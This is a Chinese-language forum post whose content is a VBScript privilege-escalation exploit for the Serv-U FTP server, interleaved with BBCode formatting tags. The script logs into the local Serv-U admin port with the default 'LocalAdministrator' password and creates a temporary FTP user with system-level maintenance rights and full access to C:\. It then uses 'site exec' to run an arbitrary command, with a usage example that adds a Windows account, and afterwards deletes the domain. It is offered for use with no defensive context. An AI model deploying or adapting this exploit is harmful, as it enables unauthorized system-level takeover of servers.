VBS的serv-u提权脚本
[font=宋体, Verdana, Arial, Helvetica, sans-serif][size=14px][color=#000000][color=#0000bb][/color][font=新宋体][color=#dd0000]‘usage:wscript su.vbs "net user cooldiyer 12345456 /add"on error resume next
Dim servuManagePort
Dim servuManageName
Dim servuManagePass
Dim command
servuManagePort = 43958 ‘[/color][color=#0000bb]修改为主机Serv[/color][color=#007700]-[/color][/font][font=新宋体][color=#0000bb]U的管理端口
servuManageName [/color][color=#007700]= [/color][/font][font=新宋体][color=#dd0000]"LocalAdministrator" ‘管理用户名
servuManagePass = "#l@$ak#.lk;0@P" ‘[/color][/font][font=新宋体][color=#0000bb]管理密码
command [/color][color=#007700]= [/color][color=#0000bb]LCase[/color][color=#007700]([/color][color=#0000bb]WScript[/color][color=#007700].[/color][color=#0000bb]Arguments[/color][color=#007700]([/color][color=#0000bb]0[/color][color=#007700])) ‘[/color][/font][font=新宋体][color=#0000bb]在第一个参数中设置你要运行的命令
Dim revdata
Dim sendata
Set sock=createobject("MSWinsock.Winsock")
Sock.protocol=0
Sock.connect "127.0.0.1",servuManagePort
WScript.sleep 10
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-SETDOMAIN"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Domain=hhxx|0.0.0.0|21|-1|1|0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-DynDNSEnable=0 "& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" DynIPName="& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-SETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-PortNo=21"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-User=cooldiyer"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Password=cooldiyer"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-HomeDir=c:\"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Maintenance=System"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-Ratios=None"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata=" Access=c:\|RWAMELCDP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
Sendata="-GETUSERSETUP"& chr(10) &chr(13)
Sock.senddata Sendata
WScript.sleep 10
sock.close
WScript.sleep 10
Set sock2=createobject("MSWinsock.Winsock")
Sock2.protocol=0
Sock2.connect "127.0.0.1",21
WScript.sleep 10
Sendata="USER cooldiyer"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sendata="PASS cooldiyer"& chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sendata="site exec "&command&chr(10) &chr(13)
Sock2.senddata Sendata
WScript.sleep 10
Sock2.close
WScript.sleep 10
Set sock3=createobject("MSWinsock.Winsock")
Sock3.protocol=0
Sock3.connect "127.0.0.1",servuManagePort
WScript.sleep 10
Sendata="USER "&servuManageName& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="PASS "&servuManagePass& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="SITE MAINTENANCE"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-DELETEDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-IP=0.0.0.0"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata=" PortNo=21"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sendata="-GETDOMAIN"& chr(10) &chr(13)
Sock3.senddata Sendata
WScript.sleep 10
Sock3.close[/color] [/font][/color][/size][/font]
页:
[1]